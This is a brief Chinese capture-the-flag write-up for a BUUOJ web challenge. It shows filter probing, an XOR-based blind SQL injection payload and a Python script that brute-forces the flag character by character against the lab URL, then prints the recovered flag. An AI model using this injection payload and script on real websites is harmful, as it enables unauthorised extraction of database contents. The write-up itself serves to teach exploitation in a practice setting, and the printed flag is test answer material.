进入题目
输入数字1
数字2
0
对select 空格 union or 等等测试发现没有过滤select 空格也被过滤 注意不能单独测试
用亦或运算
1^0为真
尝试0^if((ascii(substr((select(flag)from(flag)),1,1))=100),0,1)
回显正常
根据回显判断正误
编写脚本爆破,由于该网站请求太快会报429,请求一次要停一会
import requests
import time
url="http://e36e0dc3-393a-4d48-a608-d6a6f92b5b77.node4.buuoj.cn:81/index.php"
flag=''
for i in range(1,60):
for j in range(43,128):
payload = '0^if((ascii(substr((select(flag)from(flag)),{},1))={}),1,0)'.format(i, j)
data = {
'id': payload
}
request=requests.post(url,data)
time.sleep(0.005)
if 'glzjin' in request.text:
flag+=chr(j)
print(flag)
flag{a16bf2d9-c0a2-4ad0-9be6-78bf4f581de6}
标签:url,Day2,substr,flag,Web1,import,World,select From: https://www.cnblogs.com/v3n0m-cccccc/p/18288476